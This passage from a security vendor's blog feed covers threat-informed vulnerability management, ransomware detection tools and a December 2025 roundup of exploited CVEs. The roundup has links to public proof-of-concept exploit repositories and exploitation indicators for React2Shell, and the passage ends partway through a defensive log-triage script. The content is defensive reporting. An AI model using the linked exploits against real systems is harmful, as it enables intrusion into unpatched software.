          <li><strong>Connecting the Dots with Vulnerability Tools:</strong> When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.</li>
        </ol>
        <h2>Three Strategic Recommendations for Security Leaders</h2>
        <p>Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.</p>
        <p><strong>1. Bridge the Gap Between Security and IT</strong></p>
        <p>Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.</p>
        <p><strong>2. Embrace Automation and Workflow Integration</strong></p>
        <p>Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.</p>
        <p><strong>3. Measure What Matters — Time-to-Remediate (TTR)</strong></p>
        <p>Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.</p>
        <h2>The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy</h2>
        <p>Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.</p>
        <p>Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.</p>
        <p>Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.</p>
        <p>By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the primary difference between a Vulnerability and a Threat?</h3>
              <p>A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the biggest challenge facing traditional vulnerability management programs today?</h3>
              <p>The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Why is integrating external threat intelligence mandatory for TVM in 2026?</h3>
              <p>External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future Vulnerability Intelligence help with prioritization?</h3>
              <p>Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is Attack Surface Intelligence, and what role does it play in TVM?</h3>
              <p>Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?</h3>
              <p>While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle is typically:</p>
              <ul>
                <li>Identify Assets</li>
                <li>Scan for Vulnerabilities</li>
                <li>Enrich with Threat Context</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1db30163db7f6aa5dca641559f3f07e312ffaeda4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Best Ransomware Detection Tools]]></title>
            <link>https://www.recordedfuture.com/blog/best-ransomware-detection-tools</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/best-ransomware-detection-tools</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.</li>
          <li>The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.</li>
          <li>Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.</li>
          <li>Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.</li>
        </ul>
        <h2>Introduction</h2>
        <p>The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.</p>
        <p>The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the <a href="https://www.verizon.com/business/resources/Ta64/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Verizon Data Breach Investigations Report</a>. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.</p>
        <p>This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).</p>
        <p>The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.</p>
        <p>The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.</p>
        <h2>The Ransomware Detection Tool Landscape: Three Pillars of Defense</h2>
        <p>Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.</p>
        <h3>1. Endpoint and Extended Detection and Response (EDR/XDR) Tools</h3>
        <p>EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.</p>
        <p><strong>Core Functionality</strong></p>
        <p>EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When a threat is detected, these tools automatically isolate the affected device, roll back changes, and contain the activity, cutting response time from hours to seconds.</p>
        <p><strong>How Threat Intelligence Enhances EDR/XDR</strong></p>
        <p>Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>CrowdStrike Falcon</strong> delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.</li>
          <li><strong>Microsoft Defender XDR</strong> integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.</li>
          <li><strong>SentinelOne</strong> employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.</li>
        </ul>
        <h3>2. Network Detection and Response (NDR) Tools</h3>
        <p>While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.</p>
        <p><strong>Core Functionality</strong></p>
        <p>NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.</p>
        <p><strong>How Threat Intelligence Improves NDR and Deception</strong></p>
        <p>Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Vectra AI</strong> specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.</li>
          <li><strong>ExtraHop Reveal(x)</strong> provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.</li>
          <li><strong>Illusive (now part of Zscaler)</strong> deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.</li>
        </ul>
        <h3>3. Threat Intelligence Tools</h3>
        <p>The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.</p>
        <p><strong>Core Functionality</strong></p>
        <p>Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.</p>
        <p><strong>How Threat Intelligence Strengthens Ransomware Detection</strong></p>
        <p>These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:</p>
        <ul>
          <li><strong>Threat Mapping:</strong> Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped by their TTPs to assess their intent and opportunity to carry out a successful attack against your business.</li>
          <li><strong>Infrastructure Tracking:</strong> Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.</li>
          <li><strong>Variant Identification:</strong> Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.</li>
          <li><strong>Exploitation Intelligence:</strong> Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.</li>
          <li><strong>Risk Scoring:</strong> Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.</li>
        </ul>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Recorded Future</strong> delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.</li>
          <li><strong>Flashpoint</strong> specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.</li>
          <li><strong>Google Threat Intelligence (formerly Mandiant)</strong> combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.</li>
        </ul>
        <h2>Choosing the Right Ransomware Detection Tools</h2>
        <p>Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.</p>
        <p><strong>Security leaders should prioritize:</strong></p>
        <ul>
          <li><strong>Pre-encryption visibility:</strong> Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.</li>
          <li><strong>Context-rich alerts:</strong> Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.</li>
          <li><strong>Integration maturity:</strong> Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.</li>
          <li><strong>Operational efficiency:</strong> Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.</li>
          <li><strong>Relevance:</strong> Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.</li>
          <li><strong>Scalability:</strong> Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.</li>
        </ul>
        <h2>How Recorded Future Enables Early Ransomware Detection</h2>
        <p>The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing the <a href="https://www.recordedfuture.com/blog/reduce-alert-fatigue">alert fatigue</a> that drains analyst time on false positives instead of credible threats.</p>
        <p>Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.</p>
        <h3>Real-Time Relevance Through <a href="https://www.recordedfuture.com/products/secops-intelligence">SecOps Intelligence</a></h3>
        <p>Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.</p>
        <h3>Proactive Mitigation Through Vulnerability Intelligence</h3>
        <p>Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.</p>
        <p>The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.</p>
        <h3>Victimology and Anticipation</h3>
        <p>Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.</p>
        <p>This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.</p>
        <h2>Shifting From Reactive Response to Intelligence-Led Prevention</h2>
        <p>No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.</p>
        <p>Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>Can behavioral analytics alone stop zero-day ransomware variants?</h3>
              <p>While powerful, behavioral analytics alone cannot guarantee that a true zero-day ransomware variant will be stopped. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the most common weakness of signature-based ransomware detection methods today?</h3>
              <p>The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?</h3>
              <p>Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?</h3>
              <p>Recorded Future's <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence Module</a> provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Is a dedicated deception technology platform considered a primary ransomware detection tool?</h3>
              <p>Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_195c3ebf5f4567c5e03d5fb20c8916aafc7cfb0e3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity]]></title>
            <link>https://www.recordedfuture.com/blog/december-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/december-2025-cve-landscape</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.]]></description>
            <content:encoded><![CDATA[
        <p>December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>22 vulnerabilities</strong> requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>React2Shell pandemonium:</strong> CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families</li>
          <li><strong>China-nexus exploitation intensifies:</strong> Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations</li>
          <li><strong>Public exploits proliferate:</strong> Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines</li>
          <li><strong>Legacy vulnerabilities resurface:</strong> CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps</li>
        </ul>
        <p><strong>Bottom line:</strong> December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in December 2025.</em></p>
        <table>
          <thead>
            <tr><th>#</th><th>Vulnerability</th><th>Risk Score</th><th>Affected Vendor/Product</th><th>Vulnerability Type/Component</th><th>Public PoC</th></tr>
          </thead>
          <tbody>
            <tr><td>1</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMtKwC/overview">CVE-2025-55182</a></td><td>99</td><td>Meta React Server Components</td><td>CWE-502 (Deserialization of Untrusted Data)</td><td><a href="https://github.com/search?q=CVE-2025-55182&amp;type=repositories">Yes</a></td></tr>
            <tr><td>2</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBRk_r0/overview">CVE-2025-66644</a></td><td>99</td><td>Array Networks ArrayOS AG</td><td>CWE-78 (OS Command Injection)</td><td>No</td></tr>
            <tr><td>3</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4U81/overview">CVE-2025-48572</a></td><td>99</td><td>Google Android</td><td>CWE-306 (Missing Authentication for Critical Function)</td><td>No</td></tr>
            <tr><td>4</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4lfv/overview">CVE-2025-48633</a></td><td>99</td><td>Google Android</td><td>Insufficient Information</td><td>No</td></tr>
            <tr><td>5</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaz1-z/overview">CVE-2025-59718</a></td><td>99</td><td>Fortinet Multiple Products</td><td>CWE-347 (Improper Verification of Cryptographic Signature)</td><td><a href="https://github.com/search?q=CVE-2025-59718&amp;type=repositories">Yes</a></td></tr>
            <tr><td>6</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBa2HBm/overview">CVE-2025-59719</a></td><td>99</td><td>Fortinet FortiWeb</td><td>CWE-347 (Improper Verification of Cryptographic Signature)</td><td><a href="https://github.com/moften/CVE-2025-59718-Fortinet-Poc">Yes</a></td></tr>
            <tr><td>7</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaZM-R/overview">CVE-2025-62221</a></td><td>99</td><td>Microsoft Windows</td><td>CWE-416 (Use After Free)</td><td>No</td></tr>
            <tr><td>8</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMhTQJ/overview">CVE-2025-8110</a></td><td>99</td><td>Gogs</td><td>CWE-22 (Path Traversal)</td><td><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></td></tr>
            <tr><td>9</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBgciBg/overview">CVE-2025-14174</a></td><td>99</td><td>Google Chromium</td><td>CWE-787 (Out-of-bounds Write)</td><td><a href="https://github.com/zeroxjf/CVE-2025-14174-analysis">Yes</a></td></tr>
            <tr><td>10</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBhnuhP/overview">CVE-2025-14611</a></td><td>99</td><td>Gladinet CentreStack and Triofox</td><td>CWE-798 (Use of Hard-coded Credentials)</td><td><a href="https://github.com/pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit">Yes</a></td></tr>
            <tr><td>11</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBsdjtE/overview">CVE-2025-59374</a></td><td>99</td><td>ASUS Live Update</td><td>CWE-506 (Embedded Malicious Code)</td><td>No</td></tr>
            <tr><td>12</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBtm5Fw/overview">CVE-2025-20393</a></td><td>99</td><td>Cisco Multiple Products</td><td>CWE-20 (Improper Input Validation)</td><td><a href="https://github.com/search?q=CVE-2025-20393&amp;type=repositories">Yes</a></td></tr>
            <tr><td>13</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQ0/overview">CVE-2025-43529</a></td><td>99</td><td>Apple Multiple Products</td><td>CWE-416 (Use After Free)</td><td>No</td></tr>
            <tr><td>14</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/5RY_KG/overview">CVE-2025-40602</a></td><td>99</td><td>SonicWall SMA1000 appliance</td><td>CWE-250 (Execution with Unnecessary Privileges)</td><td>No</td></tr>
            <tr><td>15</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBw5PCQ/overview">CVE-2025-14733</a></td><td>99</td><td>WatchGuard Firebox</td><td>CWE-787 (Out-of-bounds Write)</td><td>No</td></tr>
            <tr><td>16</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBx5LcP/overview">CVE-2025-14847</a></td><td>99</td><td>MongoDB and MongoDB Server</td><td>CWE-130 (Improper Handling of Length Parameter Inconsistency)</td><td><a href="https://github.com/search?q=CVE-2025-14847&amp;type=repositories">Yes</a></td></tr>
            <tr><td>17</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/t9VBl0/overview">CVE-2023-52163</a></td><td>99</td><td>Digiever DS-2105 Pro</td><td>CWE-862 (Missing Authorization)</td><td>No</td></tr>
            <tr><td>18</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/Z2-Qcf/overview">CVE-2018-4063</a></td><td>99</td><td>Sierra Wireless AirLink ALEOS</td><td>CWE-434 (Unrestricted Upload of File with Dangerous Type)</td><td>No</td></tr>
            <tr><td>19</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BA5mEyi/overview">CVE-2025-58360</a></td><td>99</td><td>OSGeo GeoServer</td><td>CWE-611 (Improper Restriction of XML External Entity Reference)</td><td><a href="https://github.com/search?q=CVE-2025-58360&amp;type=repositories">Yes</a></td></tr>
            <tr><td>20</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/7KUyzy/overview">CVE-2025-6218</a></td><td>99</td><td>RARLAB WinRAR</td><td>CWE-22 (Path Traversal)</td><td><a href="https://github.com/search?q=CVE-2025-6218&amp;type=repositories">Yes</a></td></tr>
            <tr><td>21</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/neGcOR/overview">CVE-2022-37055</a></td><td>99</td><td>D-Link Routers</td><td>CWE-120 (Classic Buffer Overflow)</td><td>No</td></tr>
            <tr><td>22</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/hzmZuu/overview">CVE-2021-26828</a></td><td>99</td><td>OpenPLC ScadaBR</td><td>CWE-434 (Unrestricted Upload of File with Dangerous Type)</td><td><a href="https://github.com/search?q=CVE-2021-26828&amp;type=repositories">Yes</a></td></tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong> List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in December 2025</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Fortinet</strong> continued vulnerability concerns with two critical authentication bypass flaws</li>
          <li><strong>Google</strong> faced three vulnerabilities across Android (2) and Chromium (1) platforms</li>
          <li><strong>Microsoft</strong> dealt with a Windows kernel use-after-free vulnerability</li>
          <li><strong>Meta</strong> experienced the month's most impactful vulnerability with React2Shell</li>
          <li>Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-22</strong> – Path Traversal</li>
          <li><strong>CWE-347</strong> – Improper Verification of Cryptographic Signature</li>
          <li><strong>CWE-416</strong> – Use After Free</li>
          <li><strong>CWE-434</strong> – Unrestricted Upload of File with Dangerous Type</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong><a href="https://www.recordedfuture.com/blog/critical-react2shell-vulnerability">React2Shell exploitation</a></strong> <strong>dominated December’s CVE activity:</strong></p>
        <ul>
          <li><strong>Threat actors observed to have exploited this vulnerability:</strong>
            <ul>
              <li><strong>China-nexus actors</strong> Earth Lamia and Jackpot Panda</li>
              <li><strong>China-linked clusters</strong> UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595</li>
              <li>North Korea-linked and financially motivated groups</li>
            </ul>
          </li>
          <li><strong>Observed payloads</strong> included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)</li>
          <li><strong>Infrastructure connections</strong> to HiddenOrbit relay infrastructure and GobRAT relay component</li>
        </ul>
        <p><strong>Additional activity:</strong></p>
        <ul>
          <li><strong>UAT-9686</strong> exploited Cisco Secure Email Gateway (<strong>CVE-2025-20393</strong>), deploying AquaShell, AquaPurge, and AquaTunnel</li>
          <li><strong>Unknown actors</strong> leveraged Gogs vulnerability (<strong>CVE-2025-8110</strong>) for Supershell malware deployment</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed widespread exploitation.</p>
        <h3>CVE-2025-55182 | Meta React Server Components (React2Shell)</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added December 5, 2025</p>
        <p><strong>Why this matters:</strong> An unauthenticated remote code execution flaw in React Server Components affects React and Next.js, two of the world's most widely deployed web frameworks. Multiple threat actors are actively exploiting vulnerable instances and dropping a diverse set of malware payloads.</p>
        <p><strong>Affected versions:</strong></p>
        <ul>
          <li>React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)</li>
          <li>Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77</li>
          <li>Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin</li>
        </ul>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately</li>
          <li>Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5</li>
          <li>Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints</li>
          <li>Check logs for E{"digest" error patterns indicating exploitation attempts</li>
          <li>Review server processes for unexpected Node.js child processes</li>
        </ul>
        <p><strong>Exposure:</strong> ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)</p>
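        <p>The monitoring items above translate into a first-pass log triage. The following Python is an added example, not Recorded Future's tooling: it scans JSON-lines web-server records for the two indicators the list names, multipart/form-data POSTs aimed at Server Action / RSC endpoints and responses carrying the <code>E{"digest"</code> error row. The list above does not name request headers; the example assumes the <code>Next-Action</code> and <code>RSC</code> headers that Next.js sets on that traffic, and the log format and sample records are constructed.</p>

```python
"""Triage JSON-lines web-server records for the two React2Shell (CVE-2025-55182)
indicators listed above. Added example, not Recorded Future's tooling; the log
format and the sample records are constructed for the example."""
import json
import re
from dataclasses import dataclass

# Prefix of a React Flight error row: the E{"digest" pattern named on the page.
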